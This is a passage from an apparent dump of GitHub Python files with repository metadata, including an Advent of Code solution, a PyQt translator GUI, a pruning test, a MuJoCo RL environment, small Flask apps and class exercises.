neighbours = point.neighbours\n if point.is_empty and not any(p.is_full for p in neighbours):\n changes.append(point)\n elif point.is_full and sum(p.is_full for p in neighbours) >= self.num_occupied_to_move:\n changes.append(point)\n else:\n continue\n new_could_change.update(neighbours)\n new_could_change.add(point)\n\n self.could_change = new_could_change\n for update in changes:\n update.toggle()\n return len(changes) > 0\n\n def num_occupied(self) -> int:\n return sum(p.is_full for row in self.grid for p in row)\n\n def __str__(self) -> str:\n return \"\\n\".join(\"\".join(str(x) for x in row) for row in self.grid) + \"\\n\"\n\n\ndef main() -> None:\n with open(INPUT, \"r\") as fin:\n part_1_grid = Grid(fin, True, 4)\n with open(INPUT, \"r\") as fin:\n part_2_grid = Grid(fin, False, 5)\n\n while part_1_grid.step():\n pass\n\n while part_2_grid.step():\n pass\n\n print(part_1_grid.num_occupied())\n print(part_2_grid.num_occupied())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NickG123/AdventOfCode2020","sub_path":"Day 11/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17793755087","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\n#!/usr/bin/env python\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QToolTip, QPushButton, QMessageBox)\r\nfrom PyQt5.QtCore import QUrl\r\nimport webbrowser\r\nimport http.client, urllib.parse\r\nfrom PyQt5.QtGui import QDesktopServices\r\n\r\nclass Ui_HCI(object):\r\n def setupUi(self, HCI):\r\n HCI.setObjectName(\"HCI\")\r\n HCI.resize(1187, 837)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(14)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n HCI.setFont(font)\r\n self.centralwidget = QtWidgets.QWidget(HCI)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.textEdit = QtWidgets.QTextEdit(self.centralwidget)\r\n self.textEdit.setGeometry(QtCore.QRect(30, 230, 411, 381))\r\n font = QtGui.QFont()\r\n font.setPointSize(12)\r\n self.textEdit.setFont(font)\r\n self.textEdit.setObjectName(\"textEdit\")\r\n data = self.textEdit.toPlainText()\r\n self.textEdit_2 = QtWidgets.QTextEdit(self.centralwidget)\r\n self.textEdit_2.setReadOnly(True)\r\n self.textEdit_2.setGeometry(QtCore.QRect(740, 230, 411, 381))\r\n self.textEdit_2.setObjectName(\"textEdit_2\")\r\n self.commandLinkButton = QtWidgets.QCommandLinkButton(self.centralwidget)\r\n self.commandLinkButton.setGeometry(QtCore.QRect(20, 760, 225, 48))\r\n self.commandLinkButton.setObjectName(\"commandLinkButton\")\r\n self.commandLinkButton_2 = QtWidgets.QCommandLinkButton(self.centralwidget)\r\n self.commandLinkButton_2.setGeometry(QtCore.QRect(930, 750, 225, 48))\r\n self.commandLinkButton_2.setObjectName(\"commandLinkButton_2\")\r\n self.commandLinkButton_3 = QtWidgets.QCommandLinkButton(self.centralwidget)\r\n self.commandLinkButton_3.setGeometry(QtCore.QRect(510, 380, 151, 48))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(12)\r\n self.commandLinkButton_3.setFont(font)\r\n self.commandLinkButton_3.setObjectName(\"commandLinkButton_3\")\r\n '''self.comboBox = QtWidgets.QComboBox(self.centralwidget)\r\n self.comboBox.setGeometry(QtCore.QRect(30, 140, 231, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(10)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.comboBox.setFont(font)\r\n self.comboBox.setObjectName(\"comboBox\")\r\n self.comboBox.addItem(\"\")\r\n self.comboBox.addItem(\"\")'''\r\n self.comboBox_3 = QtWidgets.QComboBox(self.centralwidget)\r\n self.comboBox_3.setGeometry(QtCore.QRect(740, 140, 231, 51))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Segoe UI\")\r\n font.setPointSize(10)\r\n font.setBold(True)\r\n font.setUnderline(False)\r\n font.setWeight(75)\r\n self.comboBox_3.setFont(font)\r\n self.comboBox_3.setObjectName(\"comboBox_3\")\r\n languages = ['Afrikaans','Arabic','Bangla','Bosnian','Bulgarian','Cantonese', 'Catalan', 'Chinese Simplified', 'Chinese Traditional','Croatian', 'Czech','Danish','Dutch','English','Estonian','Fijian','Filipino','Finnish','French','German','Greek',\r\n 'Haitian Creole','Hebrew','Hindi','Hmong Daw','Hungarian','Indonesian','Italian','Japanese','Kiswahili','Klingon','Klingon (plqaD)','Korean','Latvian','Lithuanian','Malagasy'\r\n ,'Malay','Maltese','Norwegian','Persian','Polish','Portuguese','Queretaro Otomi','Romanian','Russian','Samoan','Serbian (Cyrillic)','Serbian (Latin)','Slovak','Slovenian','Spanish'\r\n ,'Swedish','Tahitian','Tamil','Thai','Tongan','Turkish','Ukrainian','Urdu','Vietnamese','Welsh','Yucatec Maya']\r\n self.comboBox_3.addItems(languages)\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(460, 10, 291, 61))\r\n font = QtGui.QFont()\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label.setFont(font)\r\n self.label.setObjectName(\"label\")\r\n HCI.setCentralWidget(self.centralwidget)\r\n\r\n self.retranslateUi(HCI,data)\r\n QtCore.QMetaObject.connectSlotsByName(HCI)\r\n\r\n def printfunc(self ):\r\n subscriptionKey = 'SUBSCRIPTION KEY'\r\n\r\n host = 'api.microsofttranslator.com'\r\n path = '/V2/Http.svc/Translate'\r\n\r\n test = str(self.comboBox_3.currentText())\r\n\r\n target = self.languagesel(test)\r\n if (target == 'error'):\r\n \r\n target = self.languagesel(test)\r\n else:\r\n text = self.textEdit.toPlainText()\r\n params = '?to=' + target + '&text=' + urllib.parse.quote(text)\r\n headers = {'Ocp-Apim-Subscription-Key': subscriptionKey}\r\n conn = http.client.HTTPSConnection(host)\r\n conn.request (\"GET\", path + params, None, headers)\r\n response = conn.getresponse ()\r\n result = response.read()\r\n result = result [68 : len(result)-9]\r\n self.textEdit_2.setText(result.decode(\"utf-8\"))\r\n\r\n def retranslateUi(self, HCI,data):\r\n _translate = QtCore.QCoreApplication.translate\r\n HCI.setWindowTitle(_translate(\"HCI\", \"HCI\"))\r\n self.commandLinkButton.setText(_translate(\"HCI\", \"Report Error\"))\r\n self.commandLinkButton.clicked.connect(lambda: webbrowser.open('https://ufl.qualtrics.com/jfe/form/SV_eONVoLWuM7cjqNn'))\r\n self.commandLinkButton_2.setText(_translate(\"HCI\", \"Complete Interaction\"))\r\n self.commandLinkButton_2.clicked.connect(lambda: webbrowser.open('https://ufl.qualtrics.com/jfe/form/SV_9uY6i1QKmNNw5O5'))\r\n self.commandLinkButton_3.setText(_translate(\"HCI\", \"TRANSLATE\"))\r\n self.commandLinkButton_3.clicked.connect(self.printfunc)\r\n self.comboBox_3.setItemText(0, _translate(\"HCI\", \"Translate to\"))\r\n\r\n self.label.setText(_translate(\"HCI\", \"TRANSLATOR\"))\r\n\r\n def languagesel(self, lang):\r\n\r\n if lang == 'Afrikaans':\r\n return 'af'\r\n elif lang == 'Arabic':\r\n return 'ar'\r\n elif lang == 'Bangla':\r\n return 'bn'\r\n elif lang == 'Bosnian':\r\n return 'bs'\r\n elif lang == 'Bulgarian':\r\n return 'bg'\r\n elif lang == 'Cantonese':\r\n return 'yue'\r\n elif lang == 'Catalan':\r\n return 'ca'\r\n elif lang == 'Chinese Traditional':\r\n return 'zh-Hant'\r\n elif lang == 'Chinese Simplified':\r\n return 'zh-Hans'\r\n elif lang == 'Croatian':\r\n return 'hr'\r\n elif lang == 'Czech':\r\n return 'cs'\r\n elif lang == 'Danish':\r\n return 'da'\r\n elif lang == 'Dutch':\r\n return 'nl'\r\n elif lang == 'English':\r\n return 'en'\r\n elif lang == 'Estonian':\r\n return 'et'\r\n elif lang == 'Fijian':\r\n return 'fj'\r\n elif lang == 'Filipino':\r\n return 'fil'\r\n elif lang == 'Finnish':\r\n return 'fi'\r\n elif lang == 'French':\r\n return 'fr'\r\n elif lang == 'German':\r\n return 'de'\r\n elif lang == 'Greek':\r\n return 'el'\r\n elif lang == 'Haitian Creole':\r\n return 'ht'\r\n elif lang == 'Hebrew':\r\n return 'he'\r\n elif lang == 'Hindi':\r\n return 'hi'\r\n elif lang == 'Hmong Daw':\r\n return 'mww'\r\n elif lang == 'Hungarian':\r\n return 'hu'\r\n elif lang == 'Indonesian':\r\n return 'id'\r\n elif lang == 'Italian':\r\n return 'it'\r\n elif lang == 'Japanese':\r\n return 'ja'\r\n elif lang == 'Kiswahili':\r\n return 'sw'\r\n elif lang == 'Klingon (plqaD)':\r\n return 'tlh-Qaak'\r\n elif lang == 'Klingon':\r\n return 'tlh'\r\n elif lang == 'Korean':\r\n return 'ko'\r\n elif lang == 'Latvian':\r\n return 'lv'\r\n elif lang == 'Lithuanian':\r\n return 'lt'\r\n elif lang == 'Malagasy':\r\n return 'mg'\r\n elif lang == 'Malay':\r\n return 'ms'\r\n elif lang == 'Maltese':\r\n return 'mt'\r\n elif lang == 'Norwegian':\r\n return 'nb'\r\n elif lang == 'Persian':\r\n return 'fa'\r\n elif lang == 'Polish':\r\n return 'pl'\r\n elif lang == 'Portuguese':\r\n return 'pt'\r\n elif lang == 'Queretaro Otomi':\r\n return 'otq'\r\n elif lang == 'Romanian':\r\n return 'ro'\r\n elif lang == 'Russian':\r\n return 'ru'\r\n elif lang == 'Samoan':\r\n return 'sm'\r\n elif lang == 'Serbian (Cyrillic)':\r\n return 'sr-Cyrl'\r\n elif lang == 'Serbian (Latin)':\r\n return 'sr-Latn'\r\n elif lang == 'Slovak':\r\n return 'sk'\r\n elif lang == 'Slovenian':\r\n return 'sl'\r\n elif lang == 'Spanish':\r\n return 'es'\r\n elif lang == 'Swedish':\r\n return 'sv'\r\n elif lang == 'Tahitian':\r\n return 'ty'\r\n elif lang == 'Tamil':\r\n return 'ta'\r\n elif lang == 'Thai':\r\n return 'th'\r\n elif lang == 'Tongan':\r\n return 'to'\r\n elif lang == 'Turkish':\r\n return 'tr'\r\n elif lang == 'Ukrainian':\r\n return 'uk'\r\n elif lang == 'Urdu':\r\n return 'ur'\r\n elif lang == 'Vietnamese':\r\n return 'vi'\r\n elif lang == 'Welsh':\r\n return 'cy'\r\n elif lang == 'Yucatec Maya':\r\n return 'yua'\r\n elif lang == 'Translate to':\r\n msg = QMessageBox()\r\n msg.setIcon(QMessageBox.Information)\r\n msg.setText(\"Please select a language to proceed with translation!\")\r\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\r\n msg.setEscapeButton(QMessageBox.Close)\r\n msg.exec_()\r\n return 'error'\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n HCI = QtWidgets.QMainWindow()\r\n ui = Ui_HCI()\r\n ui.setupUi(HCI)\r\n HCI.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"surbhijain18/Language-Translator","sub_path":"Translator.py","file_name":"Translator.py","file_ext":"py","file_size_in_byte":10289,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"30173366253","text":"import torch\nfrom torchvision.models import resnet18\nimport torch_pruning as tp\n\ndef test_taylor():\n model = resnet18(pretrained=True)\n\n # Importance criteria\n example_inputs = torch.randn(1, 3, 224, 224)\n imp = tp.importance.TaylorImportance()\n\n ignored_layers = []\n for m in model.modules():\n if isinstance(m, torch.nn.Linear) and m.out_features == 1000:\n ignored_layers.append(m) # DO NOT prune the final classifier!\n\n iterative_steps = 5 # progressive pruning\n pruner = tp.pruner.MagnitudePruner(\n model,\n example_inputs,\n importance=imp,\n iterative_steps=iterative_steps,\n ch_sparsity=0.5, # remove 50% channels, ResNet18 = {64, 128, 256, 512} => ResNet18_Half = {32, 64, 128, 256}\n ignored_layers=ignored_layers,\n )\n\n base_macs, base_nparams = tp.utils.count_ops_and_params(model, example_inputs)\n for i in range(iterative_steps):\n if isinstance(imp, tp.importance.TaylorImportance):\n # loss = F.cross_entropy(model(images), targets)\n loss = model(example_inputs).sum() # a dummy loss for TaylorImportance\n loss.backward()\n pruner.step()\n macs, nparams = tp.utils.count_ops_and_params(model, example_inputs)\n # finetune your model here\n # finetune(model)\n # ...\n\nif __name__==\"__main__\":\n test_taylor()","repo_name":"VainF/Torch-Pruning","sub_path":"tests/test_taylor_importance.py","file_name":"test_taylor_importance.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":1853,"dataset":"github-code","pt":"81"} +{"seq_id":"30479421086","text":"import numpy as np\n\nfrom rllab.core.serializable import Serializable\nfrom rllab.envs.base import Step\nfrom rllab.envs.gym_mujoco.mujoco_env import MujocoEnv\nfrom rllab.misc import logger\nfrom rllab.misc.overrides import overrides\n\n\ndef smooth_abs(x, param):\n return np.sqrt(np.square(x) + np.square(param)) - param\n\n\nclass HalfCheetahEnv(MujocoEnv, Serializable):\n\n FILE = 'half_cheetah.xml'\n\n def __init__(self, *args, target_velocity=None, **kwargs):\n super(HalfCheetahEnv, self).__init__(*args, **kwargs)\n Serializable.__init__(self, *args, **kwargs)\n self.target_velocity = target_velocity\n def get_current_obs(self):\n return np.concatenate([\n self.model.data.qpos.flatten()[1:],\n self.model.data.qvel.flat,\n ])\n\n def get_body_xmat(self, body_name):\n idx = self.model.body_names.index(body_name)\n return self.model.data.xmat[idx].reshape((3, 3))\n\n def get_body_com(self, body_name):\n idx = self.model.body_names.index(body_name)\n return self.model.data.com_subtree[idx]\n\n def step(self, action):\n xposbefore = self.model.data.qpos[0]\n self.forward_dynamics(action)\n xposafter = self.model.data.qpos[0]\n ob = self.get_current_obs()\n reward_ctrl = - 0.1 * np.square(action).sum()\n velocity = (xposafter - xposbefore) / self.dt\n if self.target_velocity:\n reward_run = np.abs(velocity - self.target_velocity)\n else:\n reward_run = velocity\n reward = reward_ctrl + reward_run\n done = False\n\n self.time_step += 1\n if self.max_path_length and self.time_step > self.max_path_length:\n done = True\n\n # clip reward in case mujoco sim goes crazy\n reward = np.minimum(np.maximum(-1000, reward), 1000)\n\n return ob, float(reward), done, dict(reward_run=reward_run, reward_ctrl=reward_ctrl)\n\n @overrides\n def log_diagnostics(self, paths):\n progs = [\n path[\"observations\"][-1][-3] - path[\"observations\"][0][-3]\n for path in paths\n ]\n logger.record_tabular('AverageForwardProgress', np.mean(progs))\n logger.record_tabular('MaxForwardProgress', np.max(progs))\n logger.record_tabular('MinForwardProgress', np.min(progs))\n logger.record_tabular('StdForwardProgress', np.std(progs))\n","repo_name":"jonasrothfuss/model_ensemble_meta_learning","sub_path":"rllab/envs/gym_mujoco/half_cheetah_env.py","file_name":"half_cheetah_env.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"72692559946","text":"#!/usr/bin/python3\n\"\"\"Class Rectangle\"\"\"\n\n\nfrom .base import Base\n\n\nclass Rectangle(Base):\n \"\"\"Class retangle qui herite de la class base\"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id=id)\n\n @property\n def width(self):\n \"\"\"Property\"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n\n self.__width = value\n\n @property\n def height(self):\n \"\"\"Property\"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"height must be an integer\")\n\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n\n self.__height = value\n\n @property\n def x(self):\n \"\"\"Property\"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"x must be an integer\")\n\n if not value >= 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\"Property\"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"Setter\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"y must be an integer\")\n\n if not value >= 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n @property\n def id(self):\n \"\"\"Property\"\"\"\n return self.__id\n\n @id.setter\n def id(self, value):\n \"\"\"Setter\"\"\"\n self.__id = value\n\n def area(self):\n \"\"\"Area Rectangle\"\"\"\n\n return self.height * self.width\n\n def display(self):\n \"\"\"Display the rectangle with #\"\"\"\n for i in range(self.height):\n for j in range(self.width):\n print(\"#\", end=\"\")\n print()\n\n def __str__(self):\n return \"[Rectangle] ({}) {}/{} - {}/{}\".format(\n self.id, self.x, self.y, self.width, self.height)\n\n def display(self):\n \"\"\"Recatngle # et\"\"\"\n\n for i in range(self.y):\n print(\"\")\n for i in range(self.height):\n print(\" \"*self.x + \"#\"*self.width)\n\n def update(self, *args, **kwargs):\n \"\"\"Update args\"\"\"\n\n if args:\n if len(args) > 0:\n self.id = args[0]\n if len(args) > 1:\n self.width = args[1]\n if len(args) > 2:\n self.height = args[2]\n if len(args) > 3:\n self.x = args[3]\n if len(args) > 4:\n self.y = args[4]\n\n else:\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n def to_dictionary(self):\n \"\"\"Returns the dictionary representation of the square instance\"\"\"\n\n return {'id': self.id, 'width': self.width,\n 'height': self.height, 'x': self.x, 'y': self.y}\n","repo_name":"AliSeg25/holbertonschool-higher_level_programming","sub_path":"python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4461216454","text":"from flask import Flask,render_template\nfrom flask_sqlalchemy import SQLAlchemy\napp = Flask(__name__,template_folder='templates')\n# @app.route('/')\n# @app.route('/home')\n# def hello():\n# return 'hello world'\n\n# input String\n# @app.route('/home/')\n# def hello(name):\n# return 'Hello, '+name\n\n# input Integer\n# @app.route('/home/')\n# def hello(id):\n# return 'Umur : ' + str(id)\n\n# input get post\n# @app.route('/onlyget',methods=['GET'])\n# def getMetode():\n# return 'you can read this'\n\npostAll = [\n {\n 'nim' : '10112299',\n 'name' : 'ilman teguh prasetya'\n }\n]\npostAllIf = [\n {\n }\n]\n\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n#\n# @app.route('/post')\n# def post():\n# return render_template('post.html',posts = postAll)\n# @app.route('/post-kondisi')\n# def postKondisi():\n# return render_template('post-kondisi.html',posts = postAllIf)\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"frestea09/workout_flask_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1155951757","text":"import sys, os, math\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport numpy as np\nimport tensorflow as tf\nimport time, timeit\nfrom termcolor import colored\nfrom sklearn.neighbors import NearestNeighbors\nfrom tf_nnquery import build_sphere_neighbor, build_cube_neighbor, build_nearest_neighbor\n\n\ndef check_index(radius, nnsample, database, query):\n B, N = database.shape[0:2]\n M = query.shape[1]\n\n nn_index = []\n nn_dist = []\n nn_count = np.zeros((B*M),dtype=np.int32)\n delta = np.zeros((3,),dtype=np.float32)\n\n for i in range(B):\n for j in range(M):\n cnt = 0\n for k in range(N):\n delta[0] = database[i,k,0] - query[i,j,0]\n delta[1] = database[i,k,1] - query[i,j,1]\n delta[2] = database[i,k,2] - query[i,j,2]\n\n dist = np.linalg.norm(delta)\n if (dist 1:\n geus_with_islands.append(geu.catalog)\n\n if len(geus_with_islands) == 0:\n print('There are no GEUs with islands')\n elif len(geus_with_islands) == 1:\n print('There is', 1, 'GEU with islands:', geus_with_islands)\n else:\n print('There are', len(geus_with_islands), 'geus with islands:', geus_with_islands)\n\n\ndef check_geus_uniqueness(geus_by_id):\n \"\"\"\n Checks if every scope material is assigned to just 1 GEU\n The verification is done by iterating all nodes of the GEUs generated with scope material\n This is done so that we know for sure that there are no repetitions\n :param geus_by_id: GEU dict\n :return: Void\n \"\"\"\n\n print(\"Checking GEUs uniqueness...\")\n\n node_list = []\n repetitions = {}\n for geu in geus_by_id.values():\n for node in geu.graph:\n # If it is in the list of nodes, it's repeated\n if node in node_list:\n # If it is the first repetition, add the key\n if node not in repetitions.keys():\n repetitions[node] = []\n # Add repetition\n repetitions[node].append(geu.catalog)\n # If it isn't in the list of nodes, add it\n else:\n node_list.append(node)\n\n # Print accordingly\n if len(repetitions) == 0:\n print(\"No scope material is in two different GEUs\")\n elif len(repetitions) == 1:\n print('There is', 1, 'material that belongs to multiple GEUs:', repetitions)\n else:\n print('There are', len(repetitions), 'materials that belong to multiple GEUs:', repetitions)\n\n\ndef check_geus_strength(geus_by_id):\n \"\"\"\n Checks for weakly connected GEUs\n This is done so that we know if there is any GEU for which we shouldn't assume\n that every material replaces each other\n :param geus_by_id: GEU dict\n :return: Void\n \"\"\"\n\n print(\"Checking GEUs strength...\")\n\n weakly_connected_geus = []\n # Checking for weakly connected GEUs\n for geu in geus_by_id.values():\n if geu.is_strongly_connected is False:\n weakly_connected_geus.append(geu.catalog)\n\n # Print accordingly\n if len(weakly_connected_geus) == 0:\n print('All GEUs are strongly connected')\n elif len(weakly_connected_geus) == 1:\n print('There is', 1, 'weakly connected GEUs:', weakly_connected_geus)\n else:\n print('There are', len(weakly_connected_geus), 'weakly connected GEUs:', weakly_connected_geus)\n\n\ndef check_geus(geus_by_id):\n \"\"\"\n Does in 1 statement all check_geus functions\n :param geus_by_id: GEU dict\n :return: Void\n \"\"\"\n check_geus_uniqueness(geus_by_id)\n check_geus_islands(geus_by_id)\n check_geus_strength(geus_by_id)\n print()\n print('Finished checking GEUs.')\n\n\ndef export_geus_info(geus_by_id: {}, date: dt.datetime, print_on: bool = True):\n # Generating df data\n data = []\n for geu in geus_by_id.values():\n # Making a string that can be used in the df\n catalog_string = ''\n materials_in_geu = len(geu.materials)\n counter = 1\n for mat in geu.materials:\n catalog_string += mat.catalog\n if counter < materials_in_geu:\n catalog_string += ', '\n counter += 1\n\n # Append to data\n data.append([geu.catalog, geu.domain, geu.name, len(geu.materials), catalog_string, geu.is_strongly_connected,\n geu.criticality, str(geu.leadtime) + ' +/- ' + str(geu.leadtime_sd)])\n\n # Making df\n df_export = pd.DataFrame(data, columns=['GEU', 'Dominio', 'Descripción', 'Conteo mat.', 'Materiales', 'Completo',\n 'Criticidad', 'Lead-time'])\n\n file = f'geus_info[{date.date()}].xlsx'\n df_export.to_excel('Outputs/GEUs/' + file)\n","repo_name":"aleroldan95/teco-multi-echelon","sub_path":"nx_graphs.py","file_name":"nx_graphs.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18900052554","text":"\"\"\"\nGiven an m x n binary matrix mat, return the distance of the nearest 0 for each cell.\n\nThe distance between two adjacent cells is 1.\n\n\n\nExample 1:\n\n\nInput: mat = [[0,0,0],[0,1,0],[0,0,0]]\nOutput: [[0,0,0],[0,1,0],[0,0,0]]\nExample 2:\n\n\nInput: mat = [[0,0,0],[0,1,0],[1,1,1]]\nOutput: [[0,0,0],[0,1,0],[1,2,1]]\n\n\nConstraints:\n\nm == mat.length\nn == mat[i].length\n1 <= m, n <= 104\n1 <= m * n <= 104\nmat[i][j] is either 0 or 1.\nThere is at least one 0 in mat.\n\"\"\"\nfrom collections import deque\nfrom typing import List\n\n\nclass O1Matrix:\n def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n m, n = len(mat), len(mat[0])\n DIR = [0, 1, 0, -1, 0]\n\n q = deque([])\n for r in range(m):\n for c in range(n):\n if mat[r][c] == 0:\n q.append((r, c))\n else:\n mat[r][c] = -1 # Marked as not processed yet!\n\n while q:\n r, c = q.popleft()\n for i in range(4):\n nr, nc = r + DIR[i], c + DIR[i + 1]\n if nr < 0 or nr == m or nc < 0 or nc == n or mat[nr][nc] != -1: continue\n mat[nr][nc] = mat[r][c] + 1\n q.append((nr, nc))\n return mat","repo_name":"yangmingxuan/pythonalgorithms","sub_path":"arrayandsort/O1Matrix.py","file_name":"O1Matrix.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14422577151","text":"\"\"\" Metadata dict load and dump helpers \"\"\"\n\nimport json\nimport os\n\n\"\"\"Metadata dict manipulation functions\"\"\"\ndef dict_to_file(d, fp):\n \"\"\"Write JSON serializable dict d to filepath fp\"\"\"\n\n with open(fp, 'w') as f:\n json.dump(d, f, sort_keys=False, indent=4)\n\n\ndef data_dict_to_file(d, filepath, template=None, template_path=\"\"):\n \"\"\"Write JSON serializable dicts d and template to filepath and template_path, respectively\"\"\"\n\n dict_to_file(d, filepath)\n\n if template:\n dict_to_file(template, template_path)\n\n\ndef data_dict_to_s3(s3_resource, bucket_name, d, filename):\n \"\"\"Write JSON serializable dict d to filepath on s3_resource \"\"\"\n\n s3_resource.Object(\n bucket_name, d['loc'] + filename\n ).put(ACL='bucket-owner-full-control', Body=json.dumps(d))\n\n\ndef dict_from_file(fp):\n \"\"\"Load JSON serialized dict from filepath fp\"\"\"\n\n with open(fp, 'r') as f:\n return json.load(f)\n\n\ndef data_dict_from_file(filepath):\n \"\"\"Read JSON serialized dict from filepath, loading values from template if applicable\"\"\"\n d = dict_from_file(filepath)\n\n if d.get('template_path'):\n if d['template_path'][0]== '/':\n tfp = d['template_path']\n else:\n tfp = os.path.normpath(\n os.path.join(os.path.dirname(filepath), d['template_path'])\n )\n td = dict_from_file(tfp)\n d = dict(list(td.items()) + list(d.items()))\n\n return d\n\n\ndef data_dict_from_s3(s3_resource, bucket_name, filename):\n \"\"\"Read JSON serializable dict d from filepath on s3_resource \"\"\"\n\n response = s3_resource.Object(\n bucket_name, filename\n ).get()\n return json.loads(response['Body'].read())\n","repo_name":"LiminalSciences/mc10_parser","sub_path":"mc10_parser/dictio.py","file_name":"dictio.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41306248849","text":"from flask import Flask, Response\nimport database_services.RDBService as d_service\nfrom flask_cors import CORS\nimport json\n\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nfrom application_services.imdb_artists_resource import IMDBArtistResource\nfrom application_services.UsersResource.user_service import UserResource\n\n\napp = Flask(__name__)\nCORS(app)\n\n\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n\n@app.route('/imdb/artists/')\ndef get_artists_by_prefix(prefix):\n res = IMDBArtistResource.get_by_name_prefix(prefix)\n rsp = Response(json.dumps(res), status=200, content_type=\"application/json\")\n return rsp\n\n@app.route('/users/')\ndef get_users_by_prefix(prefix):\n res = UserResource.get_by_user_prefix(prefix)\n rsp = Response(json.dumps(res), status=200, content_type=\"application/json\")\n return rsp\n\n@app.route('/users')\ndef get_users():\n res = UserResource.get_by_template(None)\n rsp = Response(json.dumps(res, default=str), status=200, content_type=\"application/json\")\n return rsp\n\n\n@app.route('////')\ndef get_by_prefix(db_schema, table_name, column_name, prefix):\n res = d_service.RDBService().get_by_prefix(db_schema, table_name, column_name, prefix)\n rsp = Response(json.dumps(res, default=str), status=200, content_type=\"application/json\")\n return rsp\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"yingjinsun/teamproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"37088737729","text":"def climbStairs(n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n if n ==1:\n return 1\n if n==2:\n return 2\n s = [1,2]\n s.extend([0 for _ in range(n-2)])\n for i in range(2,n):\n s[i] = s[i-1]+s[i-2]\n\n return s[n-1]\n\n\n\na = climbStairs(4)\nprint(a)\n \n","repo_name":"springlustre/leetcode-execise-python","sub_path":"execise1/70Climbing Stairs.py","file_name":"70Climbing Stairs.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39017346591","text":"from collections import deque\nimport pyqtgraph as pg\n\n# Protocol constants (duplicated because of import problems)\nKEY = 'k'\nVALUE = 'v'\nTIME = 't'\nCUSTOM_DISPLAY = 'custom_display'\n\nDEFAULT_MAX_DATA_SERIES_LENGTH = 1000\n\nview_boxes = {}\n\nclass Display():\n # Override these\n def __init__(self):\n self.title = None\n self.view_box = None\n self.view_box_id = None\n @classmethod\n def accepts_value(cls, value):\n return True\n def add_value(self, message):\n pass\n def init_view_box(self, view_box):\n pass\n def render(self):\n pass\n\n # Shouldn't need to override these ones\n def set_title(self, title):\n self.title = title\n def set_view_box_id(self, view_box_id):\n self.view_box_id = view_box_id\n def render_with_init(self, win):\n if not self.view_box:\n global view_boxes\n if self.view_box_id:\n if self.view_box_id in view_boxes:\n self.view_box = view_boxes[self.view_box_id]\n self.view_box.setTitle(self.view_box_id)\n else:\n win.nextRow()\n self.view_box = 